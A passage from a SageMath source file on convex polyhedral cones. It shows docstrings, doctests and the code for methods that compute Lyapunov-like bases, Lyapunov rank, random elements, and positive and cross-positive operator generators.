sage: K = cones.trivial(0)
sage: K.lyapunov_like_basis()
[]
The Lyapunov-like transformations on the nonnegative orthant are
diagonal matrices::
sage: K = cones.nonnegative_orthant(1)
sage: K.lyapunov_like_basis()
[[1]]
sage: K = cones.nonnegative_orthant(2)
sage: K.lyapunov_like_basis()
[
[1 0] [0 0]
[0 0], [0 1]
]
sage: K = cones.nonnegative_orthant(3)
sage: K.lyapunov_like_basis()
[
[1 0 0] [0 0 0] [0 0 0]
[0 0 0] [0 1 0] [0 0 0]
[0 0 0], [0 0 0], [0 0 1]
]
Only the identity matrix is Lyapunov-like on the pyramids
defined by the one- and infinity-norms [RNPA2011]_::
sage: l31 = Cone([(1,0,1), (0,-1,1), (-1,0,1), (0,1,1)])
sage: l31.lyapunov_like_basis()
[
[1 0 0]
[0 1 0]
[0 0 1]
]
sage: l3infty = Cone([(0,1,1), (1,0,1), (0,-1,1), (-1,0,1)])
sage: l3infty.lyapunov_like_basis()
[
[1 0 0]
[0 1 0]
[0 0 1]
]
TESTS:
Every operator in a :meth:`lyapunov_like_basis` is Lyapunov-like
on the cone::
sage: set_random_seed()
sage: K = random_cone(max_ambient_dim=8)
sage: LL = K.lyapunov_like_basis()
sage: all( L.is_lyapunov_like_on(K) for L in LL )
True
The Lyapunov-like transformations on a cone and its dual are
transposes of one another. However, there's no reason to expect
that one basis will consist of transposes of the other::
sage: set_random_seed()
sage: K = random_cone(max_ambient_dim=8)
sage: LL1 = K.lyapunov_like_basis()
sage: LL2 = (L.transpose() for L in K.dual().lyapunov_like_basis())
sage: V = VectorSpace(K.lattice().base_field(), K.lattice_dim()^2)
sage: LL1_vecs = ( V(m.list()) for m in LL1 )
sage: LL2_vecs = ( V(m.list()) for m in LL2 )
sage: V.span(LL1_vecs) == V.span(LL2_vecs)
True
The space of all Lyapunov-like transformations is a Lie algebra
and should therefore be closed under the lie bracket::
sage: set_random_seed()
sage: K = random_cone(max_ambient_dim=4)
sage: LL = K.lyapunov_like_basis()
sage: W = VectorSpace(K.lattice().base_field(), K.lattice_dim()**2)
sage: LL_W = W.span( W(m.list()) for m in LL )
sage: brackets = ( W((L1*L2 - L2*L1).list()) for L1 in LL
....: for L2 in LL )
sage: all( b in LL_W for b in brackets )
True
"""
# Matrices are not vectors in Sage, so we have to convert them
# to vectors explicitly before we can find a basis. We need these
# two values to construct the appropriate "long vector" space.
F = self.lattice().base_field()
n = self.lattice_dim()
# These tensor products contain a basis for the orthogonal
# complement of the Lyapunov-like transformations on this cone.
tensor_products = ( s.tensor_product(x)
for (x,s) in self.discrete_complementarity_set() )
# Convert those tensor products to long vectors.
W = VectorSpace(F, n**2)
perp_vectors = ( W(tp.list()) for tp in tensor_products )
# Now find the Lyapunov-like transformations (as long vectors).
LL_vectors = W.span(perp_vectors).complement()
# And finally convert the long vectors back to matrices.
M = MatrixSpace(F, n, n)
return [ M(v.list()) for v in LL_vectors.basis() ]
def lyapunov_rank(self):
r"""
Compute the Lyapunov rank of this cone.
The Lyapunov rank of a cone is the dimension of the space of its
Lyapunov-like transformations --- that is, the length of a
:meth:`lyapunov_like_basis`. Equivalently, the Lyapunov rank is
the dimension of the Lie algebra of the automorphism group of
the cone.
OUTPUT:
A nonnegative integer representing the Lyapunov rank of this cone.
If the ambient space is trivial, then the Lyapunov rank will be
zero. On the other hand, if the dimension of the ambient vector
space is `n > 0`, then the resulting Lyapunov rank will be
between `1` and `n^2` inclusive. If this cone :meth:`is_proper`,
then that upper bound reduces from `n^2` to `n`. A Lyapunov rank
of `n-1` is not possible (by Lemma 6 [Or2017]_) in either case.
ALGORITHM:
Algorithm 3 [Or2017]_ is used. Every closed convex cone is
isomorphic to a Cartesian product of a proper cone, a subspace,
and a trivial cone. The Lyapunov ranks of the subspace and
trivial cone are easy to compute. Essentially, we "peel off"
those easy parts of the cone and compute their Lyapunov ranks
separately. We then compute the rank of the proper cone by
counting a :meth:`lyapunov_like_basis` for it. Summing the
individual ranks gives the Lyapunov rank of the original cone.
REFERENCES:
- [GT2014]_
- [Or2017]_
- [RNPA2011]_
EXAMPLES:
The Lyapunov rank of the nonnegative orthant is the same as the
dimension of the ambient space [RNPA2011]_::
sage: positives = cones.nonnegative_orthant(1)
sage: positives.lyapunov_rank()
1
sage: quadrant = cones.nonnegative_orthant(2)
sage: quadrant.lyapunov_rank()
2
sage: octant = cones.nonnegative_orthant(3)
sage: octant.lyapunov_rank()
3
A vector space of dimension `n` has Lyapunov rank `n^{2}`
[Or2017]_::
sage: Q5 = VectorSpace(QQ, 5)
sage: gs = Q5.basis() + [ -r for r in Q5.basis() ]
sage: K = Cone(gs)
sage: K.lyapunov_rank()
25
A pyramid in three dimensions has Lyapunov rank one [RNPA2011]_::
sage: l31 = Cone([(1,0,1), (0,-1,1), (-1,0,1), (0,1,1)])
sage: l31.lyapunov_rank()
1
sage: l3infty = Cone([(0,1,1), (1,0,1), (0,-1,1), (-1,0,1)])
sage: l3infty.lyapunov_rank()
1
A ray in `n` dimensions has Lyapunov rank `n^{2} - n + 1`
[Or2017]_::
sage: K = Cone([(1,0,0,0,0)])
sage: K.lyapunov_rank()
21
sage: K.lattice_dim()**2 - K.lattice_dim() + 1
21
A subspace of dimension `m` in an `n`-dimensional ambient space
has Lyapunov rank `n^{2} - m(n - m)` [Or2017]_::
sage: e1 = vector(QQ, [1,0,0,0,0])
sage: e2 = vector(QQ, [0,1,0,0,0])
sage: z = (0,0,0,0,0)
sage: K = Cone([e1, -e1, e2, -e2, z, z, z])
sage: K.lyapunov_rank()
19
sage: K.lattice_dim()**2 - K.dim()*K.codim()
19
Lyapunov rank is additive on a product of proper cones [RNPA2011]_::
sage: l31 = Cone([(1,0,1), (0,-1,1), (-1,0,1), (0,1,1)])
sage: octant = Cone([(1,0,0), (0,1,0), (0,0,1)])
sage: K = l31.cartesian_product(octant)
sage: K.lyapunov_rank()
4
sage: l31.lyapunov_rank() + octant.lyapunov_rank()
4
Two linearly-isomorphic cones have the same Lyapunov rank
[RNPA2011]_. A cone linearly-isomorphic to the nonnegative octant
will have Lyapunov rank ``3``::
sage: K = Cone([(1,2,3), (-1,1,0), (1,0,6)])
sage: K.lyapunov_rank()
3
Lyapunov rank is invariant under :meth:`dual` [RNPA2011]_::
sage: K = Cone([(2,2,4), (-1,9,0), (2,0,6)])
sage: K.lyapunov_rank() == K.dual().lyapunov_rank()
True
TESTS:
Lyapunov rank should be additive on a product of proper cones
[RNPA2011]_::
sage: set_random_seed()
sage: K1 = random_cone(max_ambient_dim=6,
....: strictly_convex=True,
....: solid=True)
sage: K2 = random_cone(max_ambient_dim=6,
....: strictly_convex=True,
....: solid=True)
sage: K = K1.cartesian_product(K2)
sage: K.lyapunov_rank() == K1.lyapunov_rank() + K2.lyapunov_rank()
True
Lyapunov rank should be invariant under a linear isomorphism
[Or2017]_::
sage: set_random_seed()
sage: K1 = random_cone(max_ambient_dim=8)
sage: n = K1.lattice_dim()
sage: A = random_matrix(QQ, n, algorithm='unimodular')
sage: K2 = Cone( ( A*r for r in K1 ), lattice=K1.lattice())
sage: K1.lyapunov_rank() == K2.lyapunov_rank()
True
Lyapunov rank should be invariant under :meth:`dual` [RNPA2011]_::
sage: set_random_seed()
sage: K = random_cone(max_ambient_dim=8)
sage: K.lyapunov_rank() == K.dual().lyapunov_rank()
True
The Lyapunov rank of a proper polyhedral cone in a non-trivial
`n`-dimensional space can be any number between `1` and `n`
inclusive, excluding `n-1` [GT2014]_::
sage: set_random_seed()
sage: K = random_cone(max_ambient_dim=8,
....: min_rays=1,
....: strictly_convex=True,
....: solid=True)
sage: b = K.lyapunov_rank()
sage: n = K.lattice_dim()
sage: 1 <= b <= n
True
sage: b == n-1
False
No polyhedral closed convex cone in `n` dimensions has Lyapunov
rank `n-1` [Or2017]_::
sage: set_random_seed()
sage: K = random_cone(max_ambient_dim=8)
sage: K.lyapunov_rank() == K.lattice_dim() - 1
False
The calculation of the Lyapunov rank of an improper cone can
be reduced to that of a proper cone [Or2017]_::
sage: set_random_seed()
sage: K = random_cone(max_ambient_dim=8)
sage: K_SP = K.solid_restriction().strict_quotient()
sage: l = K.lineality()
sage: c = K.codim()
sage: actual = K.lyapunov_rank()
sage: expected = K_SP.lyapunov_rank() + K.dim()*(l + c) + c**2
sage: actual == expected
True
The Lyapunov rank of a cone is the length of a
:meth:`lyapunov_like_basis` for it::
sage: set_random_seed()
sage: K = random_cone(max_ambient_dim=8)
sage: K.lyapunov_rank() == len(K.lyapunov_like_basis())
True
A "perfect" cone has Lyapunov rank `n` or more in `n`
dimensions. We can make any cone perfect by adding a slack
variable::
sage: set_random_seed()
sage: K = random_cone(max_ambient_dim=8)
sage: L = ToricLattice(K.lattice_dim() + 1)
sage: K = Cone([ r.list() + [0] for r in K ], lattice=L)
sage: K.lyapunov_rank() >= K.lattice_dim()
True
"""
# The solid_restriction() and strict_quotient() methods
# already check if the cone is solid or strictly convex, so we
# can't save any additional time here by seeing if those
# methods would be no-ops.
#
# The call to solid_restriction() restricts K to its own span,
# resulting in the cone K_S from the paper. The call to
# strict_quotient() then restricts K_S to the span of its dual.
K_SP = self.solid_restriction().strict_quotient()
# K_SP is proper, so we have to compute its Lyapunov rank the
# hard way -- by counting a Lyapunov-like basis for it.
m = self.dim()
n = self.lattice_dim()
l = self.lineality()
# cf. Theorem 2
return len(K_SP.lyapunov_like_basis()) + l*m + (n - m)*n
def random_element(self, ring=ZZ):
r"""
Return a random element of this cone.
All elements of a convex cone can be represented as a
nonnegative linear combination of its generators. A random
element is thus constructed by assigning random nonnegative
weights to the generators of this cone. By default, these
weights are integral and the resulting random element will live
in the same lattice as the cone.
The random nonnegative weights are chosen from ``ring`` which
defaults to ``ZZ``. When ``ring`` is not ``ZZ``, the random
element returned will be a vector. Only the rings ``ZZ`` and
``QQ`` are currently supported.
INPUT:
- ``ring`` -- (default: ``ZZ``) the ring from which the random
generator weights are chosen; either ``ZZ`` or ``QQ``.
OUTPUT:
Either a lattice element or vector contained in both this cone
and its ambient vector space. If ``ring`` is ``ZZ``, a lattice
element is returned; otherwise a vector is returned. If ``ring``
is neither ``ZZ`` nor ``QQ``, then a ``NotImplementedError`` is
raised.
EXAMPLES:
The trivial element ``()`` is always returned in a trivial space::
sage: set_random_seed()
sage: K = cones.trivial(0)
sage: K.random_element()
N()
sage: K.random_element(ring=QQ)
()
A random element of the trivial cone in a nontrivial space is zero::
sage: set_random_seed()
sage: K = cones.trivial(3)
sage: K.random_element()
N(0, 0, 0)
sage: K.random_element(ring=QQ)
(0, 0, 0)
A random element of the nonnegative orthant should have all
components nonnegative::
sage: set_random_seed()
sage: K = cones.nonnegative_orthant(3)
sage: all( x >= 0 for x in K.random_element() )
True
sage: all( x >= 0 for x in K.random_element(ring=QQ) )
True
If ``ring`` is not ``ZZ`` or ``QQ``, an error is raised::
sage: set_random_seed()
sage: K = Cone([(1,0),(0,1)])
sage: K.random_element(ring=RR)
Traceback (most recent call last):
...
NotImplementedError: ring must be either ZZ or QQ.
TESTS:
Any cone should contain a random element of itself::
sage: set_random_seed()
sage: K = random_cone(max_ambient_dim=8)
sage: K.contains(K.random_element())
True
sage: K.contains(K.random_element(ring=QQ))
True
The ambient vector space of the cone should contain a random
element of the cone::
sage: set_random_seed()
sage: K = random_cone(max_ambient_dim=8)
sage: K.random_element() in K.lattice().vector_space()
True
sage: K.random_element(ring=QQ) in K.lattice().vector_space()
True
By default, the random element should live in this cone's lattice::
sage: set_random_seed()
sage: K = random_cone(max_ambient_dim=8)
sage: K.random_element() in K.lattice()
True
A strictly convex cone contains no lines, and thus no negative
multiples of any of its elements besides zero::
sage: set_random_seed()
sage: K = random_cone(max_ambient_dim=8, strictly_convex=True)
sage: x = K.random_element()
sage: x.is_zero() or not K.contains(-x)
True
The sum of random elements of a cone lies in the cone::
sage: set_random_seed()
sage: K = random_cone(max_ambient_dim=8)
sage: K.contains(sum(K.random_element() for i in range(10)))
True
sage: K.contains(sum(K.random_element(QQ) for i in range(10)))
True
The sum of random elements of a cone belongs to its ambient
vector space::
sage: set_random_seed()
sage: K = random_cone(max_ambient_dim=8)
sage: V = K.lattice().vector_space()
sage: sum(K.random_element() for i in range(10)) in V
True
sage: sum(K.random_element(ring=QQ) for i in range(10)) in V
True
By default, the sum of random elements of the cone should live
in the cone's lattice::
sage: set_random_seed()
sage: K = random_cone(max_ambient_dim=8)
sage: sum(K.random_element() for i in range(10)) in K.lattice()
True
"""
if not ring in [ZZ, QQ]:
# This cone theoretically lives in a real vector space,
# but in Sage, we work over the rationals to avoid
# numerical issues. Thus ``ring`` must consist of
# rationals so that the ambient vector space will contain
# the resulting random element.
raise NotImplementedError('ring must be either ZZ or QQ.')
# The lattice or vector space in which the return value will live.
L = self.lattice()
if ring is not ZZ:
L = L.vector_space()
# Scale each generator by a random nonnegative factor.
terms = ( ring.random_element().abs()*L(g) for g in self )
# Make sure we return a lattice element or vector. Without the
# explicit conversion, we return ``0`` when we have no rays.
return L(sum(terms))
def positive_operators_gens(self, K2=None):
r"""
Compute minimal generators of the positive operators on this cone.
A linear operator on a cone is positive if the image of
the cone under the operator is a subset of the cone. This
concept can be extended to two cones: the image of the
first cone under a positive operator is a subset of the
second cone, which may live in a different space.
The positive operators (on one or two fixed cones) themselves
form a closed convex cone. This method computes and returns
the generators of that cone as a list of matrices.
INPUT:
- ``K2`` -- (default: ``self``) the codomain cone; the image of
this cone under the returned generators is a subset of ``K2``.
OUTPUT:
A list of `m`-by-`n` matrices where `m` is the ambient dimension
of ``K2`` and `n` is the ambient dimension of this cone. Each
matrix `P` in the list has the property that `P(x)` is an
element of ``K2`` whenever `x` is an element of this cone.
The returned matrices generate the cone of positive operators
from this cone to ``K2``; that is,
- Any nonnegative linear combination of the returned matrices
sends elements of this cone to ``K2``.
- Every positive operator on this cone (with respect to ``K2``)
is some nonnegative linear combination of the returned matrices.
ALGORITHM:
Computing positive operators directly is difficult, but
computing their dual is straightforward using the generators of
Berman and Gaiha. We construct the dual of the positive
operators, and then return the dual of that, which is guaranteed
to be the desired positive operators because everything is
closed, convex, and polyhedral.
.. SEEALSO::
:meth:`cross_positive_operators_gens`,
:meth:`lyapunov_like_basis`,
:meth:`Z_operators_gens`
REFERENCES:
- [BG1972]_
- [BP1994]_
- [Or2018b]_
EXAMPLES:
Positive operators on the nonnegative orthant are nonnegative
matrices::
sage: K = Cone([(1,)])
sage: K.positive_operators_gens()
[[1]]
sage: K = Cone([(1,0),(0,1)])
sage: K.positive_operators_gens()
[
[1 0] [0 1] [0 0] [0 0]
[0 0], [0 0], [1 0], [0 1]
]
The trivial cone in a trivial space has no positive operators::
sage: K = cones.trivial(0)
sage: K.positive_operators_gens()
[]
Every operator is positive on the trivial cone::
sage: K = cones.trivial(1)
sage: K.positive_operators_gens()
[[1], [-1]]
sage: K = cones.trivial(2)
sage: K.is_trivial()
True
sage: K.positive_operators_gens()
[
[1 0] [-1 0] [0 1] [ 0 -1] [0 0] [ 0 0] [0 0] [ 0 0]
[0 0], [ 0 0], [0 0], [ 0 0], [1 0], [-1 0], [0 1], [ 0 -1]
]
Every operator is positive on the ambient vector space::
sage: K = Cone([(1,),(-1,)])
sage: K.is_full_space()
True
sage: K.positive_operators_gens()
[[1], [-1]]
sage: K = Cone([(1,0),(-1,0),(0,1),(0,-1)])
sage: K.is_full_space()
True
sage: K.positive_operators_gens()
[
[1 0] [-1 0] [0 1] [ 0 -1] [0 0] [ 0 0] [0 0] [ 0 0]
[0 0], [ 0 0], [0 0], [ 0 0], [1 0], [-1 0], [0 1], [ 0 -1]
]
A non-obvious application is to find the positive operators on the
right half-plane [Or2018b]_::
sage: K = Cone([(1,0),(0,1),(0,-1)])
sage: K.positive_operators_gens()
[
[1 0] [0 0] [ 0 0] [0 0] [ 0 0]
[0 0], [1 0], [-1 0], [0 1], [ 0 -1]
]
TESTS:
A random positive operator should send a random element of one
cone into the other cone::
sage: set_random_seed()
sage: K1 = random_cone(max_ambient_dim=3)
sage: K2 = random_cone(max_ambient_dim=3)
sage: pi_gens = K1.positive_operators_gens(K2)
sage: L = ToricLattice(K1.lattice_dim() * K2.lattice_dim())
sage: pi_cone = Cone(( g.list() for g in pi_gens ),
....: lattice=L,
....: check=False)
sage: P = matrix(K2.lattice_dim(),
....: K1.lattice_dim(),
....: pi_cone.random_element(QQ).list())
sage: K2.contains(P*K1.random_element(ring=QQ))
True
The lineality space of the dual of the positive operators
can be computed from the lineality spaces of the cone and
its dual [Or2018b]_::
sage: set_random_seed()
sage: K = random_cone(max_ambient_dim=3)
sage: pi_gens = K.positive_operators_gens()
sage: L = ToricLattice(K.lattice_dim()**2)
sage: pi_cone = Cone(( g.list() for g in pi_gens ),
....: lattice=L,
....: check=False)
sage: actual = pi_cone.dual().linear_subspace()
sage: U1 = [ vector((s.tensor_product(x)).list())
....: for x in K.lines()
....: for s in K.dual() ]
sage: U2 = [ vector((s.tensor_product(x)).list())
....: for x in K
....: for s in K.dual().lines() ]
sage: expected = pi_cone.lattice().vector_space().span(U1+U2)
sage: actual == expected
True
The lineality of the dual of the positive operators is known
from its lineality space [Or2018b]_::
sage: set_random_seed()
sage: K = random_cone(max_ambient_dim=3)
sage: n = K.lattice_dim()
sage: m = K.dim()
sage: l = K.lineality()
sage: pi_gens = K.positive_operators_gens()
sage: L = ToricLattice(n**2)
sage: pi_cone = Cone((g.list() for g in pi_gens),
....: lattice=L,
....: check=False)
sage: actual = pi_cone.dual().lineality()
sage: expected = l*(m - l) + m*(n - m)
sage: actual == expected
True
The dimension of the positive operators on a cone depends on the
dimension and lineality of that cone [Or2018b]_::
sage: set_random_seed()
sage: K = random_cone(max_ambient_dim=3)
sage: n = K.lattice_dim()
sage: m = K.dim()
sage: l = K.lineality()
sage: pi_gens = K.positive_operators_gens()
sage: L = ToricLattice(n**2)
sage: pi_cone = Cone((g.list() for g in pi_gens),
....: lattice=L,
....: check=False)
sage: actual = pi_cone.dim()
sage: expected = n**2 - l*(m - l) - (n - m)*m
sage: actual == expected
True
The trivial cone, full space, and half-plane all give rise to the
expected dimensions [Or2018b]_::
sage: n = ZZ.random_element(5)
sage: K = cones.trivial(n)
sage: L = ToricLattice(n^2)
sage: pi_gens = K.positive_operators_gens()
sage: pi_cone = Cone((g.list() for g in pi_gens),
....: lattice=L,
....: check=False)
sage: pi_cone.dim() == n^2
True
sage: K = K.dual()
sage: K.is_full_space()
True
sage: pi_gens = K.positive_operators_gens()
sage: pi_cone = Cone((g.list() for g in pi_gens),
....: lattice=L,
....: check=False)
sage: pi_cone.dim() == n^2
True
sage: K = Cone([(1,0),(0,1),(0,-1)])
sage: pi_gens = K.positive_operators_gens()
sage: pi_cone = Cone((g.list() for g in pi_gens),
....: check=False)
sage: pi_cone.dim() == 3
True
The lineality of the positive operators follows from the
description of its generators [Or2018b]_::
sage: set_random_seed()
sage: K = random_cone(max_ambient_dim=3)
sage: n = K.lattice_dim()
sage: pi_gens = K.positive_operators_gens()
sage: L = ToricLattice(n**2)
sage: pi_cone = Cone((g.list() for g in pi_gens),
....: lattice=L,
....: check=False)
sage: actual = pi_cone.lineality()
sage: expected = n**2 - K.dim()*K.dual().dim()
sage: actual == expected
True
The trivial cone, full space, and half-plane all give rise to
the expected linealities [Or2018b]_::
sage: n = ZZ.random_element(5)
sage: K = cones.trivial(n)
sage: L = ToricLattice(n^2)
sage: pi_gens = K.positive_operators_gens()
sage: pi_cone = Cone((g.list() for g in pi_gens),
....: lattice=L,
....: check=False)
sage: pi_cone.lineality() == n^2
True
sage: K = K.dual()
sage: K.is_full_space()
True
sage: pi_gens = K.positive_operators_gens()
sage: pi_cone = Cone((g.list() for g in pi_gens),
....: lattice=L,
....: check=False)
sage: pi_cone.lineality() == n^2
True
sage: K = Cone([(1,0),(0,1),(0,-1)])
sage: pi_gens = K.positive_operators_gens()
sage: pi_cone = Cone((g.list() for g in pi_gens), check=False)
sage: pi_cone.lineality() == 2
True
A cone is proper if and only if its positive operators form a
proper cone [Or2018b]_::
sage: set_random_seed()
sage: K = random_cone(max_ambient_dim=3)
sage: pi_gens = K.positive_operators_gens()
sage: L = ToricLattice(K.lattice_dim()**2)
sage: pi_cone = Cone((g.list() for g in pi_gens),
....: lattice=L,
....: check=False)
sage: K.is_proper() == pi_cone.is_proper()
True
The positive operators on a permuted cone can be obtained by
conjugation::
sage: set_random_seed()
sage: K = random_cone(max_ambient_dim=3)
sage: L = ToricLattice(K.lattice_dim()**2)
sage: p = SymmetricGroup(K.lattice_dim()).random_element().matrix()
sage: pK = Cone(( p*k for k in K ), K.lattice(), check=False)
sage: pi_gens = pK.positive_operators_gens()
sage: actual = Cone((g.list() for g in pi_gens),
....: lattice=L,
....: check=False)
sage: pi_gens = K.positive_operators_gens()
sage: expected = Cone(((p*g*p.inverse()).list() for g in pi_gens),
....: lattice=L,
....: check=False)
sage: actual.is_equivalent(expected)
True
An operator is positive from one cone to another if and only if
its adjoint is positive from the dual of the second cone to the
dual of the first::
sage: set_random_seed()
sage: K1 = random_cone(max_ambient_dim=3)
sage: K2 = random_cone(max_ambient_dim=3)
sage: F = K1.lattice().vector_space().base_field()
sage: n = K1.lattice_dim()
sage: m = K2.lattice_dim()
sage: L = ToricLattice(n*m)
sage: W = VectorSpace(F, n*m)
sage: pi_gens = K1.positive_operators_gens(K2)
sage: pi_fwd = Cone((g.list() for g in pi_gens),
....: lattice=L,
....: check=False)
sage: pi_gens = K2.dual().positive_operators_gens(K1.dual())
sage: pi_back = Cone((g.list() for g in pi_gens),
....: lattice=L,
....: check=False)
sage: M_fwd = MatrixSpace(F, m, n)
sage: M_back = MatrixSpace(F, n, m)
sage: L = M_fwd(pi_fwd.random_element(ring=QQ).list())
sage: pi_back.contains(W(L.transpose().list()))
True
sage: L = M_back(pi_back.random_element(ring=QQ).list())
sage: pi_fwd.contains(W(L.transpose().list()))
True
The Lyapunov rank of the positive operators is the product of
the Lyapunov ranks of the associated cones if both are proper
[Or2018a]_::
sage: set_random_seed()
sage: K1 = random_cone(max_ambient_dim=3,
....: strictly_convex=True,
....: solid=True)
sage: K2 = random_cone(max_ambient_dim=3,
....: strictly_convex=True,
....: solid=True)
sage: pi_gens = K1.positive_operators_gens(K2)
sage: L = ToricLattice(K1.lattice_dim() * K2.lattice_dim())
sage: pi_cone = Cone((g.list() for g in pi_gens),
....: lattice=L,
....: check=False)
sage: beta1 = K1.lyapunov_rank()
sage: beta2 = K2.lyapunov_rank()
sage: pi_cone.lyapunov_rank() == beta1*beta2
True
Lyapunov-like operators on a proper polyhedral positive operator
cone can be computed from the Lyapunov-like operators on the cones
with respect to which the operators are positive [Or2018a]_::
sage: set_random_seed()
sage: K1 = random_cone(max_ambient_dim=3,
....: strictly_convex=True,
....: solid=True)
sage: K2 = random_cone(max_ambient_dim=3,
....: strictly_convex=True,
....: solid=True)
sage: pi_gens = K1.positive_operators_gens(K2)
sage: F = K1.lattice().base_field()
sage: m = K1.lattice_dim()
sage: n = K2.lattice_dim()
sage: L = ToricLattice(m*n)
sage: M1 = MatrixSpace(F, m, m)
sage: M2 = MatrixSpace(F, n, n)
sage: tps = ( M2(s.list()).tensor_product(M1(x.list()))
....: for x in K1.dual().lyapunov_like_basis()
....: for s in K2.lyapunov_like_basis() )
sage: W = VectorSpace(F, (m**2)*(n**2))
sage: expected = span(F, ( W(x.list()) for x in tps ))
sage: pi_cone = Cone((g.list() for g in pi_gens),
....: lattice=L,
....: check=False)
sage: LL_pi = pi_cone.lyapunov_like_basis()
sage: actual = span(F, ( W(x.list()) for x in LL_pi ))
sage: actual == expected
True
"""
if K2 is None:
K2 = self
# Matrices are not vectors in Sage, so we have to convert them
# to vectors explicitly before we can find a basis. We need these
# two values to construct the appropriate "long vector" space.
F = self.lattice().base_field()
n = self.lattice_dim()
m = K2.lattice_dim()
tensor_products = ( s.tensor_product(x) for x in self
for s in K2.dual() )
# Convert those tensor products to long vectors.
W = VectorSpace(F, n*m)
vectors = ( W(tp.list()) for tp in tensor_products )
check = True
if self.is_proper() and K2.is_proper():
# All of the generators involved are extreme vectors and
# therefore minimal. If this cone is neither solid nor
# strictly convex, then the tensor product of ``s`` and ``x``
# is the same as that of ``-s`` and ``-x``. However, as a
# /set/, ``tensor_products`` may still be minimal.
check = False
# Create the dual cone of the positive operators, expressed as
# long vectors.
pi_dual = Cone(vectors, ToricLattice(W.dimension()), check=check)
# Now compute the desired cone from its dual...
pi_cone = pi_dual.dual()
# And finally convert its rays back to matrix representations.
M = MatrixSpace(F, m, n)
return [ M(v.list()) for v in pi_cone ]
def cross_positive_operators_gens(self):
r"""
Compute minimal generators of the cross-positive operators on this
cone.
Any positive operator `P` on this cone will have `s(P(x)) \ge 0`
whenever `x` is an element of this cone and `s` is an element of
its dual. By contrast, the cross-positive operators need only
satisfy that property on the :meth:`discrete_complementarity_set`;
that is, when `x` and `s` are "cross" (orthogonal).
The cross-positive operators (on some fixed cone) themselves
form a closed convex cone. This method computes and returns
the generators of that cone as a list of matrices.
Cross-positive operators are also called exponentially-positive,
since they become positive operators when exponentiated. Other
equivalent names are resolvent-positive, essentially-positive,
and quasimonotone.
OUTPUT:
A list of `n`-by-`n` matrices where `n` is the ambient dimension
of this cone. Each matrix `L` in the list has the property that
`s(L(x)) \ge 0` whenever `(x,s)` is an element of this cone's
:meth:`discrete_complementarity_set`.
The returned matrices generate the cone of cross-positive operators
on this cone; that is,
- Any nonnegative linear combination of the returned matrices
is cross-positive on this cone.
- Every cross-positive operator on this cone is some nonnegative
linear combination of the returned matrices.
.. SEEALSO::
:meth:`lyapunov_like_basis`,
:meth:`positive_operators_gens`,
:meth:`Z_operators_gens`
REFERENCES:
- [SV1970]_
- [Or2018b]_
EXAMPLES:
Cross-positive operators on the nonnegative orthant are
negations of Z-matrices; that is, matrices whose off-diagonal
elements are nonnegative::
sage: K = cones.nonnegative_orthant(2)
sage: K.cross_positive_operators_gens()
[
[0 1] [0 0] [1 0] [-1 0] [0 0] [ 0 0]
[0 0], [1 0], [0 0], [ 0 0], [0 1], [ 0 -1]
]
sage: K = Cone([(1,0,0,0),(0,1,0,0),(0,0,1,0),(0,0,0,1)])
sage: all( c[i][j] >= 0 for c in K.cross_positive_operators_gens()
....: for i in range(c.nrows())
....: for j in range(c.ncols())
....: if i != j )
True
The trivial cone in a trivial space has no cross-positive
operators::
sage: K = cones.trivial(0)
sage: K.cross_positive_operators_gens()
[]
Every operator is a cross-positive operator on the ambient
vector space::
sage: K = Cone([(1,),(-1,)])
sage: K.is_full_space()
True
sage: K.cross_positive_operators_gens()
[[1], [-1]]
sage: K = Cone([(1,0),(-1,0),(0,1),(0,-1)])
sage: K.is_full_space()
True
sage: K.cross_positive_operators_gens()
[
[1 0] [-1 0] [0 1] [ 0 -1] [0 0] [ 0 0] [0 0] [ 0 0]
[0 0], [ 0 0], [0 0], [ 0 0], [1 0], [-1 0], [0 1], [ 0 -1]
]
A non-obvious application is to find the cross-positive
operators on the right half-plane [Or2018b]_::
sage: K = Cone([(1,0),(0,1),(0,-1)])
sage: K.cross_positive_operators_gens()
[
[1 0] [-1 0] [0 0] [ 0 0] [0 0] [ 0 0]
[0 0], [ 0 0], [1 0], [-1 0], [0 1], [ 0 -1]
]
Cross-positive operators on a subspace are Lyapunov-like and
vice-versa::
sage: K = Cone([(1,0),(-1,0),(0,1),(0,-1)])
sage: K.is_full_space()
True
sage: lls = span( vector(l.list())
....: for l in K.lyapunov_like_basis() )
sage: cs = span( vector(c.list())
....: for c in K.cross_positive_operators_gens() )
sage: cs == lls
True
TESTS:
The cross-positive property is possessed by every cross-positive
operator::
sage: set_random_seed()
sage: K = random_cone(max_ambient_dim=3)
sage: cp_gens = K.cross_positive_operators_gens()
sage: all( L.is_cross_positive_on(K) for L in cp_gens )
True
The lineality space of the cone of cross-positive operators is
the space of Lyapunov-like operators [Or2018b]_::
sage: set_random_seed()
sage: K = random_cone(max_ambient_dim=3)
sage: L = ToricLattice(K.lattice_dim()**2)
sage: cp_gens = K.cross_positive_operators_gens()
sage: cp_cone = Cone((g.list() for g in cp_gens),
....: lattice=L,
....: check=False)
sage: ll_basis = ( vector(l.list())
....: for l in K.lyapunov_like_basis() )
sage: lls = L.vector_space().span(ll_basis)
sage: cp_cone.linear_subspace() == lls
True
The lineality spaces of the duals of the positive and cross-
positive operator cones are equal. From this it follows that
the dimensions of the cross-positive operator cone and positive
operator cone are equal [Or2018b]_::
sage: set_random_seed()
sage: K = random_cone(max_ambient_dim=3)
sage: pi_gens = K.positive_operators_gens()
sage: cp_gens = K.cross_positive_operators_gens()
sage: L = ToricLattice(K.lattice_dim()**2)
sage: pi_cone = Cone((g.list() for g in pi_gens),
....: lattice=L,
....: check=False)
sage: cp_cone = Cone((g.list() for g in cp_gens),
....: lattice=L,
....: check=False)
sage: pi_cone.dim() == cp_cone.dim()
True
sage: pi_star = pi_cone.dual()
sage: cp_star = cp_cone.dual()
sage: pi_star.linear_subspace() == cp_star.linear_subspace()
True
The trivial cone, full space, and half-plane all give rise to
the expected dimensions [Or2018b]_::
sage: n = ZZ.random_element(5)
sage: K = cones.trivial(n)
sage: L = ToricLattice(n^2)
sage: cp_gens = K.cross_positive_operators_gens()
sage: cp_cone = Cone((g.list() for g in cp_gens),
....: lattice=L,
....: check=False)
sage: cp_cone.dim() == n^2
True
sage: K = K.dual()
sage: K.is_full_space()
True
sage: cp_gens = K.cross_positive_operators_gens()
sage: cp_cone = Cone((g.list() for g in cp_gens),
....: lattice=L,
....: check=False)
sage: cp_cone.dim() == n^2
True
sage: K = Cone([(1,0),(0,1),(0,-1)])
sage: cp_gens = K.cross_positive_operators_gens()
sage: cp_cone = Cone(( g.list() for g in cp_gens ), check=False)
sage: cp_cone.dim() == 3
True
